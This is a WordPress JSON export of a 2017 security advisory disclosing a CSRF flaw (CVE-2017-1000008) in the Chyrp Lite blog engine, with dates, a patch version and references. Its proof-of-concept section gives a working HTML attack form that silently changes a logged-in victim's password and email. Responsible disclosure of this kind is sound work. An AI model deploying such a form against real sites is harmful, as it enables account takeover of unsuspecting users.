{"id":89,"date":"2017-03-06T21:01:24","date_gmt":"2017-03-06T21:01:24","guid":{"rendered":"https:\/\/cp270.wordpress.com\/?p=89"},"modified":"2021-01-03T16:45:07","modified_gmt":"2021-01-03T16:45:07","slug":"security-advisory-cross-site-request-forgery-in-chyrp-lite","status":"publish","type":"post","link":"https:\/\/cpearson.icu\/?p=89","title":{"rendered":"Security Advisory \u2013 Cross Site Request Forgery in Chyrp Lite"},"content":{"rendered":"<p><strong>Product:<\/strong> Chyrp Lite<br \/>\n<strong>Vendor:<\/strong> Open source community<br \/>\n<strong>Version:<\/strong> 2016.04 &#8220;Lago&#8221; and earlier<br \/>\n<strong>Category:<\/strong> Cross site request forgery (CSRF)<br \/>\n<strong>Vendor Notified:<\/strong> 2017-01-05<br \/>\n<strong>Patched:<\/strong> 2017-01-06<br \/>\n<strong>Disclosed:<\/strong> 2017-03-06<br \/>\n<strong>Researcher(s):<\/strong> Carl Pearson<br \/>\n<strong>CVE:<\/strong> CVE-2017-1000008<\/p>\n<p><strong>Summary<\/strong><br \/>\nA cross-site request forgery (CSRF) vulnerability exists in the user properites function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/>\nExample HTML attack form:<br \/>\n[code language=&#8221;html&#8221;]<br \/>\n&lt;!&#8211; The form submits when this button is clicked. &#8211;&gt;<br \/>\n&lt;button onclick=&quot;document.csrf_form.submit()&quot;&gt;Click to run&lt;\/button&gt;<br \/>\n&lt;!&#8211; Edit the &#8216;action&#8217; attribute to reflect the IP address or hostname of the victim&#8217;s Chyrp install. &#8211;&gt;<br \/>\n&lt;form name=&quot;csrf_form&quot; id=&quot;csrf_form&quot; method=&quot;POST&quot; action=&quot;http:\/\/[host]\/?action=controls&quot;&gt;<br \/>\n\t&lt;input class=&quot;text&quot; type=&quot;text&quot; name=&quot;login&quot; value=&quot;user&quot; id=&quot;login&quot; disabled=&quot;disabled&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;text&quot; name=&quot;full_name&quot; value=&quot;&quot; id=&quot;full_name&quot; tabindex=&quot;1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;text&quot; name=&quot;email&quot; value=&quot;user@example.com&quot; id=&quot;email&quot; tabindex=&quot;1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;text&quot; name=&quot;website&quot; value=&quot;http:\/\/yahoo.com&quot; id=&quot;website&quot; tabindex=&quot;1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;password&quot; name=&quot;new_password1&quot; value=&quot;apple&quot; id=&quot;new_password1&quot;\/&gt;<br \/>\n\t&lt;input type=&quot;password&quot; name=&quot;new_password2&quot; value=&quot;apple&quot; id=&quot;new_password2&quot;\/&gt;<br \/>\n&lt;\/form&gt;<br \/>\n[\/code]<\/p>\n<p><strong>Impact<\/strong><br \/>\nIf successful, an attacker can arbitrarily change the user&#8217;s password, email, and username to any desired values.<\/p>\n<p><strong>Solution<\/strong><br \/>\nChyrp Lite version 2017.01 &#8220;Swainson&#8221; patches this issue. Updating any existing Chyrp Lite installs is recommended.<\/p>\n<p><strong>Reference<\/strong><br \/>\nProject home: https:\/\/github.com\/xenocrat\/chyrp-lite<br \/>\nv2017.01 release notes: https:\/\/github.com\/xenocrat\/chyrp-lite\/releases\/tag\/v2017.01<br \/>\nChangelog: https:\/\/github.com\/xenocrat\/chyrp-lite\/commit\/79bb2de7f57d163d256b6bdb127dc09cfdb6235a<br \/>\nOWASP CSRF overview: https:\/\/www.owasp.org\/index.php\/Cross-Site_Request_Forgery_(CSRF)<\/p>\n<p>Edit 7\/13\/17: CVE identifier added.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Product: Chyrp Lite Vendor: Open source community Version: 2016.04 &#8220;Lago&#8221; and earlier Category: Cross site request forgery (CSRF) Vendor Notified: 2017-01-05 Patched: 2017-01-06 Disclosed: 2017-03-06 Researcher(s): Carl Pearson CVE: CVE-2017-1000008 Summary A cross-site request forgery (CSRF) vulnerability exists in the user properites function of the Chyrp Lite blog engine. An [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-89","post","type-post","status-publish","format-standard","hentry","category-advisory"],"_links":{"self":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts\/89","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=89"}],"version-history":[{"count":1,"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts\/89\/revisions"}],"predecessor-version":[{"id":169,"href":"https:\/\/cpearson.icu\/index.php?rest_route=\/wp\/v2\/posts\/89\/revisions\/169"}],"wp:attachment":[{"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=89"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=89"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cpearson.icu\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=89"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}